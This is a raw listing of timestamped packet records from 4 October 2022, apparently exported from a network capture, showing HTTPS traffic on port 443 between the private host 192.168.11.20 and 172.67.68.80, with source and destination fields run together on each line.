                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893713951 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893742085 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893759012 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893765926 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893857002 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893934965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894016027 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894073009 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894079924 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894138098 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894145012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894167900 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894253016 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894260883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894319057 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894325972 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894433022 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894438982 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894481897 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894604921 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894633055 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894639015 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894651890 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894658089 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894838095 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894845009 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894892931 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894906998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.894983053 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895133018 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895162106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895169020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895261049 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895307064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895395994 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895452023 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895513058 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895519972 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895674944 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895709991 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895723104 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895747900 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895828009 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895834923 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895945072 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.895966053 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896035910 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896043062 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896084070 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896166086 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896229982 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896241903 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896249056 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896359921 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896368027 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896492958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896509886 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896517038 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896584034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896739960 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896754026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896819115 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896826029 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896980047 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.896986961 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897105932 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897135019 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897141933 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897274017 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897281885 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897331953 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897339106 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897459030 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897602081 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897609949 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897756100 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897763014 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897826910 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897962093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.897969007 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898050070 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898096085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898235083 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898245096 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898251057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898401976 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898462057 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898473024 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898526907 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898588896 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898637056 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898643017 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898782015 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898816109 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.898823023 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899000883 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899008036 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899105072 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899111986 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899194002 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899213076 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899225950 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899430037 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899437904 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899481058 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899578094 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899703026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899708033 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899713993 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899797916 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899872065 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899936914 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.899944067 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.900058985 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.900067091 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.900150061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.900166988 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.900173903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.900527000 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901380062 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901390076 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901550055 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901671886 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901693106 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901732922 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901830912 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901849985 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.901998043 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902004957 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902046919 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902112007 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902209044 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902215958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902304888 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902342081 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902398109 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902404070 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902543068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902545929 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902554989 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902687073 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902694941 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902740002 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902837038 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902956963 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.902964115 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.903064966 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.903263092 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.903390884 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.903400898 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.903620005 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.903625965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.903685093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.903834105 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.908786058 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.908799887 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909003973 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909013987 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909097910 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909127951 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909136057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909267902 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909329891 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909337044 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909427881 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909538031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909648895 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909656048 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909662962 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909719944 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909817934 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.909873962 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910007000 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910022020 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910031080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910120964 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910269022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910335064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910381079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910387039 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910471916 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910480022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910553932 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910561085 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910701990 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910814047 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910886049 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910974026 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.910981894 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911006927 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911083937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911175013 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911259890 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911267996 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911415100 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911587954 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911591053 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911597967 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911722898 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911772966 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911777020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911866903 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911874056 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911977053 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.911987066 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912007093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912154913 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912162066 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912252903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912262917 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912262917 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912271023 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912461042 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912484884 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912496090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912539005 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912545919 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912643909 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912650108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912653923 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912841082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912866116 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912873030 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.912929058 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913009882 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913158894 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913361073 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913369894 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913382053 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913522959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913527012 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913552046 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913630962 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913638115 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913693905 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913753986 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913764954 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913865089 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913872957 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.913928032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914072037 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914079905 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914197922 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914294958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914304972 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914326906 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914333105 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914441109 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914519072 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914530993 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914530993 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914612055 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914618969 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914738894 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914746046 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914747000 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914828062 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914834976 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914911985 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.914973021 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915136099 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915169954 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915177107 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915232897 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915321112 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915332079 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915364027 CEST49835443192.168.11.20172.67.68.80
